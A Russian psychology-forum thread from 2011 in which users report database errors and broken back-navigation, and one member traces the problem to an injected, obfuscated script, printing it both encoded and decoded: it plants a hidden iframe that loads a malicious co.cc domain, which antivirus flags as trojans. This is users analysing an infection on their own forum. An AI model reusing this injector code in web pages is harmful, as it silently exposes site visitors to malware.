Радугa Опубликовано 12 февраля, 2011 Опубликовано 12 февраля, 2011 Пора собирать группу страдающих от ПТСР Incorrect query: MySQL server has gone away[sTOPED] и терапевтировать за деньгу, а вырученные средства вкладывать в ремонт дыр сервера бизнета
Джовдет Опубликовано 12 февраля, 2011 Опубликовано 12 февраля, 2011 И опять ошибка при работе с базой данных.
Джовдет Опубликовано 12 февраля, 2011 Опубликовано 12 февраля, 2011 Идея замечательная.Как Вы это видите? На многих ресурсах существуют системы виртуальных денег для конкретного ресурса. Они могут использоваться пользователями для каких-то дополнительных возможностей, например, отправить другому участнику виртуальный подарок и т.п. Для штрафов это не пойдет (да и штрафовать - идея, мягко говоря, неудачная. Хотя бы потому, что возникает много правовых нюансов. Не стоит овчинка выделки. Повышение уровня предупреждений, премодерация, бан - это уже своеобразные "штрафы"), а вот повысить доходность форума таким способом вполне реально.
Сальери Опубликовано 12 февраля, 2011 Опубликовано 12 февраля, 2011 Все просто, проверено опытом и временем. 1. Делаем рекламу "Помощь ресурсу" с разными возможностями пополнения. 2. Ограничиваем колличество сообщений в месяц трехстами. Можно купить дополнительно пакеты 600, 1200 и безлимит))) В общем хватит, за любое удовольствие надо платить, а то критикуют все, а помочь нос воротят. Геннадий в свободное от работы время старается развивать форум, оплачивает расходы и продвижение, недосыпает, отказывается себе во многом, иногда голодает. А в ответ только претензии, и ни один не спросил чем как помочь.
AngelinaJ Опубликовано 12 февраля, 2011 Опубликовано 12 февраля, 2011 Геннадий в свободное от работы время старается развивать форум, оплачивает расходы и продвижение, недосыпает, отказывается себе во многом, иногда голодает. А жена че, не готовит?
Gennadiy Опубликовано 14 февраля, 2011 Опубликовано 14 февраля, 2011 Спасибо за добрые и злые сообщения в теме, все они свидетельствуют о том что форум это нечто важное как для отписавшихся в теме, так и для сотен человек, которые только читали её. Мне приятно оттого что я создал и поддерживаю такой ресурс. Проблемы которые наблюдаются на протяжении последней недели не связаны с тем, что кто-то плохо или мало работает или кто-то жадничает на хостинг. Я и 2 системных администратора не закрываем глаза на проблему и работаем над ней круглосуточно. Поверьте, иногда в работе с компьютерами возникают такие проблемы, которые не получается определить и устранить моментально или в желаемые сроки. Тарифный план на "хостинге" у меня один из самых дорогих, а именно выделенный сервер с двумя четырехядерными процессорами Е5520, проблема на данный момент не в большой нагрузке и не в железе т.к. протестировано и оптимизировано все что только можно было протестировать и оптимизировать. Мы продолжаем работать и надеюсь в ближайшее время форум будет функционировать без перебоев. Прошу прощения за временные неудобства.
greatlune Опубликовано 21 февраля, 2011 Опубликовано 21 февраля, 2011 сегодня утром опять ошибка с базами данных. FF, если это чем-то поможет)
Shurochka Опубликовано 25 февраля, 2011 Опубликовано 25 февраля, 2011 У меня одной чертовщина с форумом??
Julichka Опубликовано 25 февраля, 2011 Опубликовано 25 февраля, 2011 У меня одной чертовщина с форумом?? Нет, не тока у тебя, у меня тоже(((
Чижов 1 Опубликовано 3 марта, 2011 Опубликовано 3 марта, 2011 Идея замечательная.Как Вы это видите? Здравствуйте,MOONSHADOW!Предупреждать в темах на видном месте,что за флуд на форуме штрафуют.Штраф может быть мизерный.На адрес флудильщика высылается квитанция,оплата через Сберегательный Банк РФ.
Психологи brutello Опубликовано 4 марта, 2011 Психологи Опубликовано 4 марта, 2011 нет возврата из темы на шаг назад.
Чуда Опубликовано 4 марта, 2011 Опубликовано 4 марта, 2011 "прыгает" к верху страницы по несколько раз.
citizen Опубликовано 4 марта, 2011 Опубликовано 4 марта, 2011 нет возврата из темы на шаг назад. Кстати, да! У меня та же проблема (пока не попробовал - не знал). Сейчас пытался разобраться в причинах - не смог. Вкратце так. Браузер Фаерфокс. При переходе (или открытии темы в новой вкладке) в истории переходов вместо одной записи появляется 4 шт. Воспроизвести это получается не всегда. Через эту мишуру дублей прорваться назад браузером не получается - браузер "откатывает" в конец списка. Может это фича такая, чтобы люди пришедшие с других ресурсов обратно не смогли попасть? Я знаю только 2 теоретических способа искусственно создавать записи истории - <meta refresh> и то же самое джаваскриптом. Впрочем я не нашёл сниффером признаков многократного запроса одной и той же страницы... В общем загадка... P.S. Если это всё же сопровождается запросами к серверу, то это должно нехило его пригружать (и процессор, и БД, и трафик)... Дополнено: Такое ощущение, что многократную перезагрузку инициируют внешние фреймы. Страница при этом грузится ощутимо дольше, а в процессе история "жирнеет" постепенно. А админ так поигрался с заголовками, что физически перезагрузка идёт из кэша браузера. Дополнено №2: Я грешу на addthis_widget.js Из-за него ли или по какой-то иной причине в браузер грузится: _http://dasetywz.co.cc/ddndbr/qeuajaalldyk.php Он по цепочке грузит _http://vopretas.vv.cc/mcbawlk/ztcgdjtpjsj.php Он уже грузит: _http://www.yahoo.com/ А яху грузит всякие стили, картинки и т.п. В общем вся эта мишура на экране не отображается. Когда я фильтрами вырубаю dasetywz.co.cc, то страницы грузятся быстро и история не портится. Похоже на какой-то эксплойт, благодаря которому из пользователей psyche сделали ботнет. Таким ботнетом можно на выбор накручивать какую-нибудь статистику. А можно просто воровать экаунты Яху пользователей бизнета. Спасибо Брутелло, что заметил... Дополнено последний раз: Методом исключения нашёл: В конце основной страницы есть следующий закодированный троян: <script>;function fg04bHT1(){function a(b){if(b.contentDocument)return b.contentDocument;if(b.contentWindow)return b.contentWindow.document;return b.document;}var c={};with(c){d=/a/.__proto__=='//';e='\\v'=='v';}var f='crxUzGi';var g='ahArbOQA';var h='crxUzGihcrxUzGitcrxUzGitcrxUzGipcrxUzGi:crxUzGi/crxUzGi/crxUzGidcrxUzGiacrxUzGiscrxUzGiecrxUzGitcrxUzGiycrxUzGiwcrxUzGizcrxUzGi.crxUzGiccrxUzGiocrxUzGi.crxUzGiccrxUzGiccrxUzGi/crxUzGidcrxUzGidcrxUzGincrxUzGidcrxUzGibcrxUzGircrxUzGi/crxUzGiqcrxUzGiecrxUzGiucrxUzGiacrxUzGijcrxUzGiacrxUzGiacrxUzGilcrxUzGilcrxUzGidcrxUzGiycrxUzGikcrxUzGi.crxUzGipcrxUzGihcrxUzGipcrxUzGi';var k='crxUzGiicrxUzGifcrxUzGircrxUzGiacrxUzGimcrxUzGiecrxUzGi';var i=c.e?'<'+k.split(f).join('')+'name="'+g+'" src="'+h.split(f).join('')+'">':k.split(f).join('');var j=document.createElement(i);with(j){name=g;setAttribute('name',g);id=g;}if(document.body){document.body.appendChild(j);clearInterval(bRjoep);}else{return;}with(j.style){if(!c.d)position='absolute';left=top='0px';height=width='1px';visibility='hidden';}if(!c.e)a(j).location.replace(h.split(f).join(''));}if(!window.la69iYa){bRjoep=setInterval(fg04bHT1,1000);window.la69iYa=true;};</script> После удаления из текста повторяющихся "crxUzGi": <script>;function fg04bHT1(){function a(b ){if(b.contentDocument)return b.contentDocument;if(b.contentWindow)return b.contentWindow.document;return b.document;}var c={};with©{d=/a/.__proto__=='//';e='\\v'=='v';}var f='';var g='ahArbOQA';var h='http://dasetywz.co.cc/ddndbr/qeuajaalldyk.php';var k='iframe';var i=c.e?'<'+k.split(f).join('')+'name="'+g+'" src="'+h.split(f).join('')+'">':k.split(f).join('');var j=document.createElement(i);with(j){name=g;setAttribute('name',g);id=g;}if(document.body){document.body.appendChild(j);clearInterval(bRjoep);}else{return;}with(j.style){if(!c.d)position='absolute';left=top='0px';height=width='1px';visibility='hidden';}if(!c.e)a(j).location.replace(h.split(f).join(''));}if(!window.la69iYa){bRjoep=setInterval(fg04bHT1,1000);window.la69iYa=true;};</script> Это перед самым "</body></html>". Устранение этого кода существенно ускоряет загрузку страницы, лечит навигацию браузера и т.п. Именно этот код грузит dasetywz.co.cc и далее по списку выше. Антивирус последние четыре дня (кроме сегодняшнего) обнаруживает события при заходе на форум и навигации по темам: Win32/Kryptik.KJZ троянская программа модифицированный Win32/PSW.Dipwit.O троянская программа Win32/TrojanProxy.Small.MU троянская программа Специально убедился, что связано с psyche.biznet.ru Оооо! Так это не впервой... Или вирус уже месяц как в каждой странице сидит?
Deeptawn Опубликовано 5 марта, 2011 Опубликовано 5 марта, 2011 Вот и Яндекс уже говорит, что с форумом что то не то.... http://yandex.ru/infected?url=http%3A%2F%2...ect&l10n=ru Сайт psyche.biznet.ru может угрожать безопасности вашего компьютера На страницах сайта был размещен вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома, в результате действий злоумышленников. Яндекс периодически проверяет страницы сайтов, которые выводятся в результатах поиска.
Радугa Опубликовано 7 марта, 2011 Опубликовано 7 марта, 2011 При посещении страниц форума и перелистывании некоторых тем копеечный дырявый аваст то и дело выдает вот такое окно: И чо, теперь на форум не заходить, коль он засран троянами?
To Me Опубликовано 7 марта, 2011 Опубликовано 7 марта, 2011 нет возврата из темы на шаг назад. Сегодня опять нет возрата на шаг назад. Аккурат после того, как антивирусник вывесил табличку с названием нового вируса-didodnik что-то с троянской программой. вчера все работало нормально
Кайфую Опубликовано 7 марта, 2011 Опубликовано 7 марта, 2011 Опять начались прыжки (еще вчера все было нормально). https://psycheforum.ru/topic44489.html
Кайфую Опубликовано 7 марта, 2011 Опубликовано 7 марта, 2011 При загрузке форума в трее появляется значок Java (Opera+Firefox), а в Firefox появляется запрос на установку дополнительных плагинов. Добавление в фильтр содержимого строки http://dasetywz.co.cc/* ни к чему не привела.
citizen Опубликовано 7 марта, 2011 Опубликовано 7 марта, 2011 При загрузке форума в трее появляется значок Java (Opera+Firefox), а в Firefox появляется запрос на установку дополнительных плагинов. Не знаю что это. У меня как-то выскакивать пробовало разик, но пару дней назад во время экспериментов. Добавление в фильтр содержимого строки http://dasetywz.co.cc/* ни к чему не привела. Это уже не нужно, уже второй день как того скрипта нет в страницах форума. Оттого ещё более странно, что как раз повалили отчёты форумчан об обнаруженных вирусах (уже после удаления оного).
Психологи Алёна7 Опубликовано 7 марта, 2011 Психологи Опубликовано 7 марта, 2011 Оттого ещё более странно, что как раз повалили отчёты форумчаноб обнаруженных вирусах (уже после удаления оного). Вирус склонен к мутациям)))
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти